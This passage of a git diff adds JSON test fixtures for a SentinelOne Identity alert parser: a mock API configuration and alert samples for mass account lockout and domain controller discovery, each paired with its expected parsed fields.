\"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n      \"type\": \"http\",\n      \"documentation\": \"Auth required\",\n      \"method\": \"all\",\n      \"endpoint\": \"*\",\n      \"responses\": [\n        {\n          \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"header\",\n              \"modifier\": \"funfy-auth-token\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user/authenticate\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n      \"type\": \"http\",\n      \"documentation\": \"RefreshToken is required\",\n      \"method\": \"all\",\n      \"endpoint\": \"user/*\",\n      \"responses\": [\n        {\n          \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$.refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n      \"type\": \"http\",\n      \"documentation\": \"\",\n      \"method\": \"get\",\n      \"endpoint\": \"test\",\n      \"responses\": [\n        {\n          \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n          \"body\": \"{\\n  \\\"message\\\": \\\"route required auth\\\"\\n}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    }\n  ],\n  \"rootChildren\": [\n    {\n      \"type\": \"route\",\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n    },\n    {\n      \"type\": \"folder\",\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n    },\n    {\n      \"type\": \"route\",\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n    }\n  ],\n  \"proxyMode\": false,\n  \"proxyHost\": \"\",\n  \"proxyRemovePrefix\": false,\n  \"tlsOptions\": {\n    \"enabled\": false,\n    \"type\": \"CERT\",\n    \"pfxPath\": \"\",\n    \"certPath\": \"\",\n    \"keyPath\": \"\",\n    \"caPath\": \"\",\n    \"passphrase\": \"\"\n  },\n  \"cors\": true,\n  \"headers\": [\n    {\n      \"key\": \"Content-Type\",\n      \"value\": \"application/json\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Origin\",\n      \"value\": \"*\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Methods\",\n      \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Headers\",\n      \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n    }\n  ],\n  \"proxyReqHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"proxyResHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"data\": [\n    {\n      \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n      \"id\": \"8wey\",\n      \"name\": \"Globals\",\n      \"documentation\": \"\",\n      \"value\": \"\"\n    },\n    {\n      \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n      \"id\": \"zzay\",\n      \"name\": \"ISODate\",\n      \"documentation\": \"Datetime shared format comes from backend\",\n      \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n    },\n    {\n      \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n      \"id\": \"g4qq\",\n      \"name\": \"CreateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n      \"id\": \"ofz6\",\n      \"name\": \"AuthenticateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n      \"id\": \"w34k\",\n      \"name\": \"User\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n  \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n  \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n  \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n    },\n    {\n      \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n      \"id\": \"77fk\",\n      \"name\": \"Authentication\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n    }\n  ],\n  \"callbacks\": []\n}"
+  },
+  "expected": {
+    "message": "{\n  \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n  \"lastMigration\": 33,\n  \"name\": \"Mocked api\",\n  \"endpointPrefix\": \"\",\n  \"latency\": 0,\n  \"port\": 3000,\n  \"hostname\": \"\",\n  \"folders\": [\n    {\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n      \"name\": \"user\",\n      \"children\": [\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n        }\n      ]\n    }\n  ],\n  \"routes\": [\n    {\n      \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n      \"type\": \"http\",\n      \"documentation\": \"Creates new user\",\n      \"method\": \"post\",\n      \"endpoint\": \"user\",\n      \"responses\": [\n        {\n          \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"w34k\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"CreateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n      \"type\": \"http\",\n      \"documentation\": \"Logout\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/logout\",\n      \"responses\": [\n        {\n          \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n      \"type\": \"http\",\n      \"documentation\": \"Authenticate user with credentials\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/authenticate\",\n      \"responses\": [\n        {\n          \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"AuthenticateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n      \"type\": \"http\",\n      \"documentation\": \"Refresh Session\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/refresh-session\",\n      \"responses\": [\n        {\n          \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": true,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n      \"type\": \"http\",\n      \"documentation\": \"Auth required\",\n      \"method\": \"all\",\n      \"endpoint\": \"*\",\n      \"responses\": [\n        {\n          \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"header\",\n              \"modifier\": \"funfy-auth-token\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user/authenticate\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n      \"type\": \"http\",\n      \"documentation\": \"RefreshToken is required\",\n      \"method\": \"all\",\n      \"endpoint\": \"user/*\",\n      \"responses\": [\n        {\n          \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$.refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n      \"type\": \"http\",\n      \"documentation\": \"\",\n      \"method\": \"get\",\n      \"endpoint\": \"test\",\n      \"responses\": [\n        {\n          \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n          \"body\": \"{\\n  \\\"message\\\": \\\"route required auth\\\"\\n}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    }\n  ],\n  \"rootChildren\": [\n    {\n      \"type\": \"route\",\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n    },\n    {\n      \"type\": \"folder\",\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n    },\n    {\n      \"type\": \"route\",\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n    }\n  ],\n  \"proxyMode\": false,\n  \"proxyHost\": \"\",\n  \"proxyRemovePrefix\": false,\n  \"tlsOptions\": {\n    \"enabled\": false,\n    \"type\": \"CERT\",\n    \"pfxPath\": \"\",\n    \"certPath\": \"\",\n    \"keyPath\": \"\",\n    \"caPath\": \"\",\n    \"passphrase\": \"\"\n  },\n  \"cors\": true,\n  \"headers\": [\n    {\n      \"key\": \"Content-Type\",\n      \"value\": \"application/json\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Origin\",\n      \"value\": \"*\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Methods\",\n      \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Headers\",\n      \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n    }\n  ],\n  \"proxyReqHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"proxyResHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"data\": [\n    {\n      \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n      \"id\": \"8wey\",\n      \"name\": \"Globals\",\n      \"documentation\": \"\",\n      \"value\": \"\"\n    },\n    {\n      \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n      \"id\": \"zzay\",\n      \"name\": \"ISODate\",\n      \"documentation\": \"Datetime shared format comes from backend\",\n      \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n    },\n    {\n      \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n      \"id\": \"g4qq\",\n      \"name\": \"CreateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n      \"id\": \"ofz6\",\n      \"name\": \"AuthenticateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n      \"id\": \"w34k\",\n      \"name\": \"User\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n  \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n  \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n  \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n    },\n    {\n      \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n      \"id\": \"77fk\",\n      \"name\": \"Authentication\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n    }\n  ],\n  \"callbacks\": []\n}",
+    "event": {
+      "category": "intrusion_detection",
+      "kind": "alert",
+      "type": "info"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "sentinelone": {
+      "identity": {
+        "name": "Mocked api"
+      }
+    }
+  }
+}
diff --git a/SentinelOne/identity/tests/test_alert_3.json b/SentinelOne/identity/tests/test_alert_3.json
new file mode 100644
index 000000000..cbc475032
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_3.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T10:09:37.779000Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+      "start": "2024-11-22T10:09:37.779000Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T10:09:37.779000Z",
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "UNKNOWN",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935359-3eda-7903-93fc-af6a0e5d0a8f",
+        "name": "Brute force attack - Mass Account Lockout",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_4.json b/SentinelOne/identity/tests/test_alert_4.json
new file mode 100644
index 000000000..64efcfc10
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_4.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T10:09:17.184000Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+      "start": "2024-11-22T10:09:17.184000Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T10:09:17.184000Z",
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "UNKNOWN",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935358-ee81-7eb7-b57f-022c6f0019a9",
+        "name": "Brute force attack - Mass Account Lockout",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json
new file mode 100644
index 000000000..f1339df60
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_5.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
